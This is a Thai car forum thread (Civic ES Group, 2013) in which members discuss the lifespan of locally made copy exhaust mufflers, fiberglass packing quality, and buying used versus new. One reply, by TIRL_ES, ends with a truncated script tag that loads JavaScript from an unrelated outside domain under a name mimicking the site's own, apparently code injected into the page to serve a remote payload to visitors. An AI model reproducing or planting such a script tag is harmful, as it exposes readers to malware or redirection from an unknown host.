ตอบ
cisco

ชื่อเล่น: เต้น

เข้าร่วม: 25 พฤศจิกา 2008
ตอบ: 3557

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5197
ให้คำขอบคุณ: 9940
พุธ, 12 มิถุนา 2013 21:24 - ท่อไอเสีย ของเทียม (copy) มีอายุการใช้งานกี่ปี/กี่กิโล ...อยากรู้จริง ๆ
อยากรู้ว่าท่อไอเสีย Copy (ไทยทำ) ของร้านต่าง ๆ ตามที่ขาย ๆ กันนั้นมีอายุการประมาณกี่ปีคับ กรณีที่เสียงดังขึ้น ใยเสื่อมสภาพ เป็นต้น สมมุติว่าผมซื้อต่อ ปลายท่อร้าน ๆ นึง ต่อจากเพื่อนในเว็บ เจ้าของเก่าบอกใช้มา 20000 โลแล้ว ผมเอามาใช้ต่ออีก จะมีอายุได้อีกเท่าไร ???

เป็นไปได้ไหมว่าคุณภาพพอ ๆ กับท่อเดิมติดรถที่ใช้กันจนขายรถ 5 - 10 ปี ยังไม่มีปัญหาเรื่องเสียง ยังเงียบตลอดอายุการใช้งาน

ได้รับคำขอบคุณจาก: Sak_es5442 
Marwin

เข้าร่วม: 29 มกรา 2009
ตอบ: 1661

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1517
ให้คำขอบคุณ: 159

ปี: 2001
พฤหัส, 13 มิถุนา 2013 08:29 - ท่อไอเสีย ของเทียม (copy) มีอายุการใช้งานกี่ปี/กี่กิโล ...อยากรู้จริง ๆ
เด่วนี้ ท่อก้อปมีการทำใส้ที่มีคุณภาพแล้วครับอายุก้อได้ไม่ต่ำกว่า 3-5 ปีแน่ๆ
แต่การซื้อท่อมือสอง เดาอยากเรื่องอายุนะครับ ไม่ขอออกความเห็นดีกว่า...

ได้รับคำขอบคุณจาก: cisco 
deo20

เข้าร่วม: 16 ธันวา 2010
ตอบ: 970

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1192
ให้คำขอบคุณ: 107

พฤหัส, 13 มิถุนา 2013 09:52 - ท่อไอเสีย ของเทียม (copy) มีอายุการใช้งานกี่ปี/กี่กิโล ...อยากรู้จริง ๆ
ถึงจะเป็นท่อก็อป ไทยทำแท้ๆ
คุณภาพของวัสดุืั้นำมาใช้มันก็แตกต่างกันหลายเกรดครับ
แนะนำดูท่อที่มาจากร้านมีชื่อเสียงหน่อย ใยเกรดดีๆ ก็ไม่แพ้ของนอกนะครับ

ท่อไทยๆ ราคาทั่วๆไปก็ประมาณ 3500 เกือบทุกแบบ
ถ้าซื้อมือสองราคาไม่ได้ต่างกันมากมายกับของใหม่  
แนะนำเข้าร้านติดของใหม่เลยดีกว่า ติดตั้งเสร็จ

แต่แนะนำนิดนึง เปลี่ยนแค่ปลายท่อ เทียบกับท่อเดิมติดรถ
สิ่งที่จะได้มีแค่ ดูสวย และเสียงที่เพิ่มขึ้น 
แทบจะไม่ได้ช่วยเพิ่มประสิทธิภาพใดๆให้รถยนต์เลย
เสียงที่ดุกว่าท่อเดิมติดรถ ทำให้เราคิดว่ารถเราแรงขึ้น
เสียงดังขึ้น ยิ่งเหยียบยิ่งดัง ทำให้เราเหยียบมากกว่าปกติ รถมันก็เลยวิ่งกว่าปกติ

อยากเห็นผลมันต้องไล่ตั้งแต่เฮดเดอร์ พักกลาง พักปลาย ท่อเดินใหม่ทั้งเส้น แบบนี้รู้สึกถึงความเปลี่ยนแลงแน่ๆ
ได้รับคำขอบคุณจาก: Sak_es5442  nooduean_69  cisco 
TIRL_ES

ชื่อเล่น: เติ้ล

เข้าร่วม: 26 ธันวา 2011
ตอบ: 539

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 280
ให้คำขอบคุณ: 176

ปี: 2004
สี: น้ำเงิน อิเทอนอล (B-96P)
พฤหัส, 13 มิถุนา 2013 12:08 - ท่อไอเสีย ของเทียม (copy) มีอายุการใช้งานกี่ปี/กี่กิโล ...อยากรู้จริง ๆ
นาน5ปีขั้นต่ำ ดูพวกมอไซค์ ท่อผ่า ให้ใยแก้วถุงระ5บาทยัง2ปีขึ้นเลย อย่าไปคิดมากถ้าจะเปลี่ยนมือสองดูราคา + สภาพดีและเสียงว่าชอบไหมดีกว่า <script src="https://sport32news.com/civicesgroup.js"></
Ball Featuring

ชื่อเล่น: บอล

เข้าร่วม: 05 ธันวา 2010
ตอบ: 2224

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2668
ให้คำขอบคุณ: 3022

ปี: 2001
สี: ขาว ทาฟเฟต้า (NH-578)
พฤหัส, 13 มิถุนา 2013 12:14 - ท่อไอเสีย ของเทียม (copy) มีอายุการใช้งานกี่ปี/กี่กิโล ...อยากรู้จริง ๆ
แต่ท่อแท้เสียงต่างไปเลยนะคับ

แรกๆไม่เชื่อใส่ท่อก็อป2-3ใบก็ยังรู้สึกว่าเสียงไม่ต่างกันมาก

มาตอนหลังได้ท่อแท้มาในราคาที่จับต้องได้ เสียงนี่ต่างกันมากเลยคับ ตอนอัด ตอนต้น ไม่เหมือนเลย

ผมว่าใยแก้วน่าจะคนละชนิดกันนะคับ รวมถึงวัสดุ+อุปกรน์น่าจะคนละเกรดคับ ความหนาของตัวท่อด้วยผมว่าแท้จะหนากว่านะคับ
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.